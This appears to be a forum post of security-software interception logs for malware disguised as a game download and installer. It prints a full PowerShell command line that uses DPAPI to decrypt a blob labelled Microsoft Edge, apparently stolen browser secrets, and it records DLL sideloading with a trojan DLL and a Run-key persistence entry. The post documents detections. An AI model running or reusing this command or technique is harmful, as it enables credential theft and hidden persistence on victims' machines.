This post was last edited by sanhu35 on 2023-9-18 14:22
CrazydownnSettup
行为: 创建进程
拦截规则: [结束]脚本攻击(执行)
响应动作: 询问(允许)
拦截时间: 2023-09-18 14:06:50
拦截次数: 1
进程名称: cmd.exe
进程路径: C:\Windows\System32\cmd.exe
进程命令行: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,124,153,72,131,159,122,226,72,168,20,106,101,32,54,16,127,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,233,42,151,218,251,252,36,168,64,156,77,206,47,236,11,176,183,114,103,219,9,88,55,113,45,131,124,73,60,130,168,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,232,128,28,83,236,8,146,107,5,237,29,140,250,232,10,225,57,11,38,212,104,103,84,187,90,250,188,47,105,129,82,79,48,0,0,0,33,192,27,133,66,135,38,236,76,241,52,242,169,89,112,121,91,73,156,106,243,226,189,201,193,5,46,77,248,40,150,59,212,63,202,52,72,133,14,135,149,246,199,97,108,91,27,158,64,0,0,0,0,43,111,61,1,191,91,37,171,226,185,234,53,226,26,113,112,201,0,253,182,166,88,250,79,124,11,183,78,135,71,18,139,236,19,253,154,94,108,193,137,178,44,234,170,119,35,98,79,87,131,166,224,29,203,193,237,209,129,49,11,225,171,93), $null, 'CurrentUser')"
操作目标: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
DualCorps.exe
File_ BeamNG_Drive.exe
Malicious (black) DLL
木马名称:Trojan.Generic
所在路径:C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\COPY\NW_ELF.DLL
Legitimate (white) program
动作:动态链接库劫持
路径:C:\Users\Administrator\AppData\Roaming\Copy\nw.exe
Persistence
行为: 设置注册表值
拦截规则: 智能防护(添加开机启动)
响应动作: 询问(允许)
进程名称: File_ BeamNG_Drive.exe
进程路径: C:\Users\Administrator\Desktop\File_ BeamNG_Drive.exe
进程命令行: "C:\Users\Administrator\Desktop\File_ BeamNG_Drive.exe"
操作目标: HKEY_USERS\S-1-5-21-1371736503-2317628717-3822715350-500\Software\Microsoft\Windows\CurrentVersion\Run|Copy=C:\Users\Administrator\AppData\Roaming\Copy\nw.exe